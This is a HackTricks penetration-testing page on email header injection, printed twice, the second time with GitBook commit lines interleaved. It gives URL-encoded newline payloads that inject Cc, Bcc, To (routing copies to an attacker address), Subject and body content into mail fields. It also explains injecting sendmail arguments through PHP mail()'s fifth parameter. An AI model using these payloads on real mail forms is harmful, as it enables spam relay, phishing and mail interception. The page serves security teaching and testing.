hacktricks/pentesting-web/email-header-injection.md

# Email Injections

## Email Header Injection

## Inject Cc and Bcc after sender argument

```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```

The message will be sent to the recipient and recipient1 accounts.

## Inject argument

```
From:sender@domain.com%0ATo:attacker@domain.com
```

The message will be sent to the original recipient and the attacker account.

## Inject Subject argument

```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```

The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.

## Change the body of the message

Inject a two-line feed, then write your message to change the body of the message.

```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```

## PHP mail() function exploitation

```bash
# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
  - Parameters [5] {
    Parameter #0 [ <required> $to ]
    Parameter #1 [ <required> $subject ]
    Parameter #2 [ <required> $message ]
    Parameter #3 [ <optional> $additional_headers ]
    Parameter #4 [ <optional> $additional_parameters ]
  }
}
```

### The 5th parameter ($additional\_parameters)

This section is going to be based on **how to abuse this parameter supposing that an attacker controls it**.

This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function `escapeshellcmd($additional_parameters)`.

An attacker can **inject extract parameters for sendmail** in this case.

#### Differences in the implementation of /usr/sbin/sendmail

**sendmail** interface is **provided by the MTA email software** (Sendmail, Postfix, Exim etc.) installed on the system. Although the **basic functionality** (such as -t -i -f parameters) remains the **same** for compatibility reasons, **other functions and parameters** vary greatly depending on the MTA installed.

Here are a few examples of different man pages of sendmail command/interface:

* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences

Depending on the **origin of the sendmail** binary different options have been discovered to abuse them and l**eak files or even execute arbitrary commands**. Check how in [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)****

## References

* [**https://resources.infosecinstitute.com/email-injection/**](https://resources.infosecinstitute.com/email-injection/)****
* [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)****
GitBook: [#2864] update 2021-11-27 01:09:08 +00:00			`# Email Injections`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2864] update 2021-11-27 01:09:08 +00:00			`## Email Header Injection`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`## Inject Cc and Bcc after sender argument`

GitBook: [#2864] update 2021-11-27 01:09:08 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com`
			```

			`The message will be sent to the recipient and recipient1 accounts.`

			`## Inject argument`

GitBook: [#2864] update 2021-11-27 01:09:08 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`From:sender@domain.com%0ATo:attacker@domain.com`
			```

			`The message will be sent to the original recipient and the attacker account.`

			`## Inject Subject argument`

GitBook: [#2864] update 2021-11-27 01:09:08 +00:00			```
GitBook: [master] one page modified 2021-05-03 18:33:45 +00:00			`From:sender@domain.com%0ASubject:This is%20Fake%20Subject`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```

			`The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.`

			`## Change the body of the message`

			`Inject a two-line feed, then write your message to change the body of the message.`

GitBook: [#2864] update 2021-11-27 01:09:08 +00:00			```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.`
			```

GitBook: [#2864] update 2021-11-27 01:09:08 +00:00			`## PHP mail() function exploitation`

			```bash
			`# The function has the following definition:`

			`php --rf mail`

			`Function [ <internal:standard> function mail ] {`
			`- Parameters [5] {`
			`Parameter #0 [ <required> $to ]`
			`Parameter #1 [ <required> $subject ]`
			`Parameter #2 [ <required> $message ]`
			`Parameter #3 [ <optional> $additional_headers ]`
			`Parameter #4 [ <optional> $additional_parameters ]`
			`}`
			`}`
			```

			`### The 5th parameter ($additional\_parameters)`

			`This section is going to be based on how to abuse this parameter supposing that an attacker controls it.`

			This parameter is going to be added to the command line PHP will be using to invoke the binary sendmail. However, it will be sanitised with the function `escapeshellcmd($additional_parameters)`.

			`An attacker can inject extract parameters for sendmail in this case.`

			`#### Differences in the implementation of /usr/sbin/sendmail`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`sendmail interface is provided by the MTA email software (Sendmail, Postfix, Exim etc.) installed on the system. Although the basic functionality (such as -t -i -f parameters) remains the same for compatibility reasons, other functions and parameters vary greatly depending on the MTA installed.`
GitBook: [#2864] update 2021-11-27 01:09:08 +00:00
			`Here are a few examples of different man pages of sendmail command/interface:`

			`* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html`
			`* Postfix MTA: http://www.postfix.org/mailq.1.html`
			`* Exim MTA: https://linux.die.net/man/8/eximReferences`

			`Depending on the origin of the sendmail binary different options have been discovered to abuse them and leak files or even execute arbitrary commands. Check how in [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)****`

			`## References`

			`* [https://resources.infosecinstitute.com/email-injection/](https://resources.infosecinstitute.com/email-injection/)****`
			`* [https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)****`